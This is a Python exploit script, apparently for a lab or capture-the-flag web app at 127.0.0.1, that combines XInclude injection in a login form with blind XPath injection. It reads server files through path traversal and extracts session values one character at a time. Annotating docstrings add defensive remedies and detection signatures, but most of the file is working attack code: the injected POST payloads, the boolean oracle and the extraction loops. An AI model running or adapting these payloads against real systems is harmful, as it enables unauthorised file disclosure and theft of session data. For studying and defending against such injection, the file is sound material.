#!/usr/bin/python3
import requests
import getopt
import sys
import string
# Rebind the module name to a Session so every post() below shares cookies
# and connection settings. NOTE: this shadows the imported `requests` module
# for the rest of the file.
requests = requests.Session()
# Route all traffic (HTTPS included) through a local intercepting proxy on
# 127.0.0.1:8080; the script will not reach the target unless one is listening.
requests.proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
# Assigning (not updating) replaces the session's default headers; only the
# form content type is kept because the bodies below are hand-built strings.
requests.headers = {"Content-Type":"application/x-www-form-urlencoded"}
def main():
    """Entry point: recover the `@session` attribute of the log entries on the
    hard-coded local target, using only [a-z0-9] as the candidate alphabet.

    Target URL, XPath and charset are fixed here rather than read from argv,
    so the `getopt` and `sys` imports at the top are unused in this version.
    """
    retrievexpath('http://127.0.0.1', '@session', string.ascii_lowercase+string.digits)
def xinclude(url, file, parse):
    """Send login attempts whose `username` carries an XInclude element.

    Four identical POSTs embed `<xi:include href=file parse=parse/>` in the
    username field, then four plain POSTs follow. The trailing
    `</block><block foo="` in the payload suggests the username lands inside an
    attribute of a `<block>` element in an XML log that is later parsed with
    XInclude enabled — inferred from the payload shape, not visible here.
    Why exactly four of each is not stated; presumably it is the number of
    failed logins needed to reach the "Account blocked" state that
    evalXpath() tests for (TODO confirm against the target's lockout rule).

    Defensive takeaway: user input must be escaped before being written into
    XML, and the parser that reads such logs should have XInclude and
    external resource resolution disabled. Repeated POSTs containing
    `xmlns:xi=` in a form field are a distinctive detection signature.
    """
    # We are injecting the xInclude tag
    requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
    requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
    requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
    requests.post('%s/worklink/' % url,data='username=banneduser" xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="%s" parse="%s" /></block><block foo="&password=foo'%(file, parse))
    # Plain login attempts with a fixed username/password; no injection here.
    requests.post('%s/worklink/' % url,data='username=bla&password=foo')
    requests.post('%s/worklink/' % url,data='username=bla&password=foo')
    requests.post('%s/worklink/' % url,data='username=bla&password=foo')
    requests.post('%s/worklink/' % url,data='username=bla&password=foo')
def filedump(url, filename):
    """Pull `filename` from the server through the XInclude-in-log vector.

    The path is prefixed with `../../../` (traversal relative to wherever the
    log is parsed — base directory not visible here) and included with
    parse="text", then read back one printable character at a time via
    retrievexpath() against `//x/text()`. Not called from main() in this file.
    """
    # Including the profile corresponding to the username, as XML, in the logs
    local_path_to_file = '../../../%s' % (filename)
    xinclude(url, local_path_to_file, 'text')
    # The included text is expected to appear as the text node of an `<x>`
    # element — inferred from this XPath, the log structure itself is not shown.
    xpath = '//x/text()'
    charset = string.printable
    # Let's retrieve the content char by char now!
    retrievexpath(url, xpath, list(charset))
def evalXpath(url, data):
    """Boolean oracle: return True when the injected XPath predicate `data` holds.

    `data` is spliced unquoted into the username after `banneduser' and`, and
    `and '1'='1` closes the literal again; the truth value is read from whether
    the response body contains "Account blocked". Each call is one POST, so the
    callers below cost one request per probe.

    Defensive takeaway: the username must be bound as an XPath variable or have
    its quotes escaped, and the lockout response should not differ depending
    on whether the query matched — that difference is the whole side channel.
    """
    response = requests.post("%s/worklink/" % url, data="username=banneduser' and %s and '1'='1&password=foo"%(data))
    return ("Account blocked" in response.text)
def retrievexpath(url, xpath, charset, length=None):
    """Extract the string value of `xpath` from the `//log` node set, char by char.

    Step 1 includes the login log itself (as XML) through xinclude(), which the
    author uses to get the account into the blocked state evalXpath() relies
    on. Step 2 finds the string length by bisection on `string-length()`
    unless `length` is supplied. Step 3 tests every candidate in `charset`
    for every position with `substring()`. Request volume is roughly
    len(charset) POSTs per character, which is the detection signal a defender
    should look for: a burst of POSTs to /worklink/ whose username field
    contains XPath function names.

    NOTE(review): indentation was lost in the paste this was taken from; the
    bisection loop is placed under the `is None` branch to match the comment
    "if it's not given" — confirm against upstream.
    """
    # First, we are blocking our IP
    xinclude(url, "/var/www/html/worklink/db/login_log.php","xml")
    # Now we're blocked, let's retrieve data with XPath!
    # Firstly try to retrieve the length if it's not given.
    if length is None:
        # Bisection between min_length and max_length; `blength` keeps the
        # probe that was just answered so the bound can be moved to it.
        length = 1000000
        max_length = 1000000
        min_length = 0
        while True:
            print("[?] Testing with length %s"%(length))
            if(evalXpath(url, '//log[string-length(%s) < %s]' % (xpath,length))):
                # Too large: shrink toward min_length (halve, or midpoint when halving would undershoot).
                blength=length
                length = int(length / 2) if int(length / 2) >= min_length else int(length - ((length-min_length)/2))
                max_length=blength
            elif(evalXpath(url, '//log[string-length(%s)=%s]' % (xpath,length))):
                break
            else:
                # Too small: grow toward max_length (x1.5, or midpoint when that would overshoot).
                blength=length
                length = int(length + length/2) if int(length + length/2) <= max_length else int(length+((max_length-length) / 2))
                min_length=blength
    print("[+] Length is %s" % (length))
    result = ""
    for i in range(length):
        for j in charset:
            # `'` would terminate the quoted XPath literal; 0x0B/0x0C are skipped
            # presumably because they are not legal XML 1.0 characters.
            if j == "'" or ord(j) == 11 or ord(j) == 12:
                continue
            # substring() positions are 1-based, hence i+1.
            if(evalXpath(url, '//log[substring(%s,%s,1)=\'%s\']'%(xpath,i+1,j))):
                result+=j
                print("[+] Found letter %s to be : %s"%(i,j))
                break
    print("[+] Result : %s"%result)
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()